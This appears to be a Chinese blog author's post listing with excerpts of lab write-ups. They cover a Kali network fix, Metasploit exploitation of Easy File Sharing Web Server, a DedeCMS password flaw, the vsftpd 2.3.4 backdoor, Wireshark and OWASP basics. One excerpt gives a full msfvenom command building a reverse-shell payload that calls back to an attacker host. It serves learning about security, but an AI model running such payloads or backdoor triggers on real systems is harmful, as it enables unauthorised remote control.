- 博客(10)
- 收藏
- 关注
原创 使用kali时遇到的一些bug及个人解决思路记录(只是给我个人总结解决bug的记录贴)
分析办法:wirshake抓包分析流量解决办法:本次问题造成的原因是kali中的iptables的过滤规则的问题,kali限制了某些流量包的传输,如物理机与主机的tcp连接。把规则改一下就可以了分析:网络配置好了的情况下,win7可以ping win2003,但2003不能ping win7。这里说明kali配置还有服务开启应该是没问题了(路由转发服务),两个win虚拟机防火墙都关了。问题应该出在win2003上,查了win2003的ipconfig,发现它是有启用两个虚拟网卡(其他虚拟机默认只有一个),
2023-05-05 16:11:29 1249
原创 Easy File Sharing Web Server 缓冲区溢出漏洞
目录漏洞介绍环境准备复现过程一、环境搭建二、漏洞利用利用漏洞利用metasploit进行漏洞利用在kali打开msf控制台 输入命令,寻找找到EasyFileSharing漏洞的利用模块小结漏洞介绍由于Easy File Sharing Web Server 6.9这个程序对输入的用户名长度不进行校验,存在缓冲区溢出漏洞,导致当用户输入太长的用户名导致缓冲区溢出,覆盖程序原本的返回地址,导致程序因跳转到非法地址奔溃或跳转到黑客控制的恶意代码地址进...
2021-12-14 09:09:21 2226
原创 织梦修改前台登陆密码漏洞复现
实验前提准备搭建Dedecms5.7利用phpstudy在windows本地搭建dedecms网站,参考博客Dedecms V5.7 SP2版本漏洞利用_dahege666的博客-CSDN博客_织梦漏洞利用配置burp suite各种浏览器配置的参考博客Firefox+Burpsuite抓包配置(可抓取https) - slpawn - 博客园安装Max HackBar使用复现的浏览器搜索并安装插件 Max HackBar复现过程浏览器网址搜索栏,进入创建..
2021-12-13 17:39:37 3439
原创 Kali2虚拟机中工具Metasploit的简单应用
实验环境攻击机:Kali-Linux-2021.2-vmware-amd64靶机:Win2003 旗舰版实验过程一、利用metasploit生成被控端打开kali窗口,输入命令(注意空格符,复现过程惨痛代价)sudo msfvenom -p windows/meterpreter/reverse_tcp lhost=攻击机的ip地址 lport=5000 -f exe -o /root/payload.exe这样就是生成成功了远程控制程序payload.exe(...
2021-12-13 17:18:44 4381
原创 栈溢出漏洞的细节点
本人菜鸡,不会写分析栈溢出的博客,这里放上舍友写的栈溢出漏洞分析博客供学习 !我也在学bhttp://example.com/2021/11/02/%E6%A0%88%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E%E7%9A%84%E7%BB%86%E8%8A%82%E7%82%B9/http://example.com/2021/11/02/%E6%A0%88%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E%E7%9A%84%E7%BB%86%E8%8
2021-12-13 15:24:51 993
翻译 OWASP组织简介
OWASP,开放式Web应用程序安全项目(OWASP,Open Web Application Security Project)是一个非营利组织,不附属于任何企业或财团,它提供有关计算机和互联网应用程序的公正、实际、有成本效益的信息。其目的是协助个人、企业和机构来发现和使用可信赖软件。OWASP项目最具权威的就是其“十大安全漏洞列表”(OWASPTop 10),OWASP Top 10不是官方文档或标准,而只是一个被广泛采用的意识文档,被用来分类网络安全漏洞的严重程度,目前被许多漏洞奖励平台和企业安.
2021-12-13 15:15:42 2305
原创 wireshark抓ping数据包以及简单分析
相关知识1.Ping原理Ping是一句DOS 命令,一般用于检测网络通与不通 ,也叫时延,其值越大,速度越慢 PING (Packet Internet Grope),因特网包探索器,用于测试网络连接量的程序。Ping 发送一个 ICMP 回声请求消息给目的地并报告是否收到所希望的 ICMP 回声应答。它是用来检查网络是否通畅或者网络连接速度的命令。 作为一个生活在网络上的管理员或 者黑客来说,ping 命令是第一个必须掌握的 DOS 命令,它所利用的原理是这样的:网络上 的机器都有唯一确定的
2021-12-13 11:41:57 21904
原创 Ftp笑脸漏洞复现(后门漏洞)
目录漏洞简介: 这个漏洞是开发者在软件中留下的后门漏洞,当连接带有vsftpd 2.3.4版本的服务器的21端口时,输入用户中带有“:) ”,密码任意,即可运行 vsf_sysutil_extra() :打开服务器的6200端口,并且不需要密码就能从6200端口以管理员身份登入目标服务器。因为输入用户名需要带有:),所以称笑脸漏洞实验环境:实验准备实验过程小总结漏洞简介: 这个漏洞是开发者在软件中留下的后门漏洞,当连接带有vsftpd 2.3.4版本的服务器的...
2021-12-13 03:29:35 5830
原创 浅谈等保2.0
背景随着互联网的飞速发展,网络化已无处不在,网络安全已成为与国家、社会、个人息息相关的问题,并已上升到国防安全的层面,没有网络安全,社会的正常运转及发展都会受到严重的影响,甚至会造成社会乃至国家的动荡。国家基础网络设备的缺失、云服务受到的频繁攻击、重要行业和政府部门的高危漏洞及趋于新兴智能行业的安全威胁都让国家网络安全形势面临着前所未有的挑战。为保障社会的信息化安全发展,我国于2013年11月12日正式成立国家安全委员会,并在2014年2月27日成立中共中央网络安全和信息化领导小组办公室,由国家主
2021-10-31 17:23:31 1419
原创 如何制作PE启动盘
0.PE系统简介 PE系统是在Windows下制作出来的一个临时紧急系统,当电脑无法正常启动时,可以通过PE系统修复电脑里的各种问题,比如删除顽固病毒,修复磁盘引导分区,给硬盘分区,数据备份,安装电脑系统等。1.前期准备1.一个4G以上的可正常使用的U盘,建议U盘里面没有任何文件(如果有,那就备份),制作U盘PE启动盘时会对U盘进行格式化处理。2.一台正常的可使用的电脑3.一个制作U盘启动盘的软件(百度搜索“U盘启动盘”会出来一堆,随便选就行了,博主用的是《云骑士装机助手》,所以.
2021-10-31 14:49:32 4102
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人